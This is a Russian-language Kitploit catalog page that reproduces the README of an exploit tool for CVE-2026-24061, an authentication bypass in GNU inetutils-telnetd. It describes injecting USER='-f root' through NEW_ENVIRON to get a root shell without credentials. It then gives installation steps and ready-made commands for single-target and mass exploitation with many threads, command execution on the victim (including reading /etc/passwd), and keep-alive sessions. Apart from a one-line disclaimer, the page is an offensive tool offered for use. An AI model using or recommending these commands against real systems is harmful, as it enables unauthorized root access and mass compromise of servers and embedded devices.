Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061-PoC-Exploit — Эксплойт удаленного обхода аутентификации для GNU inetutils-telnetd (CVE-2026-24061) с использованием CRLF-инъекции для получения мгновенной root-оболочки. Поддерживает одиночную/массовую эксплуатацию, многопоточность, настраиваемые порты, конвейерный режим и поддержание сессии. | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

Эксплойт удаленного обхода аутентификации для GNU inetutils-telnetd (CVE-2026-24061) с использованием CRLF-инъекции для получения мгновенной root-оболочки. Поддерживает одиночную/массовую эксплуатацию, многопоточность, настраиваемые порты, конвейерный режим и поддержание сессии.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
62 месяцев назадЕщё не проверено

CVE-2026-24061

🚀 CVE-2026-24061 - Эксплойт обхода аутентификации GNU inetutils-telnetd

Python Bash License CVSS

GNU inetutils-telnetd Редакция - CRLF-инъекция для обхода аутентификации и мгновенного получения root-оболочки

📌 Обзор

Этот эксплойт использует CVE-2026-24061, критическую уязвимость удаленного обхода аутентификации в GNU inetutils-telnetd. Путем инъекции специально сформированной полезной нагрузки NEW_ENVIRON с USER='-f root' он обходит аутентификацию и предоставляет мгновенную root-оболочку без каких-либо учетных данных.

Примечание: Скрипт basic_exploit.sh — это упрощенная, более быстрая версия exploit.sh; однако для полной функциональности рекомендуется использовать exploit.sh.

🔥 Ключевые возможности

🎯 Уязвимые версии

ПродуктВерсии
GNU inetutils-telnetd1.9.3 - 2.7
Затронутые дистрибутивы LinuxDebian, CentOS, Ubuntu и их производные (Zorin OS, Linux Mint, Pop!_OS и Elementary OS)
Встраиваемые устройстваNAS, IoT, маршрутизаторы

⚠️ Отказ от ответственности: Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ является незаконным.

📦 Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

🛠️ Примеры использования

🎯 Эксплуатация одиночной цели

root@kitploit:~
# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

🔧 Пользовательский порт и пользователь

root@kitploit:~
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

📊 Массовая эксплуатация (несколько целей)

root@kitploit:~
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

📡 Режим pipe (выполнение команд)

root@kitploit:~
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

⚙️ Расширенные параметры

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

📊 Аргументы командной строки

🔗 Связанные эксплойты

Посмотрите мои другие репозитории с эксплойтами:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
Скачать инструмент
КатегорияВозможности
Эксплуатация✅ Обход аутентификации через CRLF-инъекцию
✅ Мгновенная root-оболочка
✅ Инъекция пользователя (-f admin, -f user)
Сканирование✅ Эксплуатация одиночной цели
✅ Массовая эксплуатация из файла
✅ Многопоточность (настраиваемое число потоков)
✅ Поддержка пользовательского порта
Расширенные✅ Режим pipe (выполнение команд через stdin)
✅ Поддержание сессии
✅ Механизм повторных попыток
✅ Контроль времени ожидания
Удобство использования✅ Цветной вывод (colorama)
✅ Двуязычный (Python и Bash)
✅ Подробный/отладочный режим
ShortLongОписаниеПо умолчанию
-u--urlIP-адрес целиОбязательно
-p--portПорт цели23
-l--listФайл со списком целейНет
-m--max-threadsМаксимальное число потоков для массовой эксплуатации10
-usr--usernameИмя пользователя для инъекцииroot
-t--timeoutТаймаут сокета (секунды)10
-r--retriesКоличество попыток повторения3
-v--verboseВключить отладочный выводFalse
--keep-aliveПоддерживать сессию после эксплуатацииFalse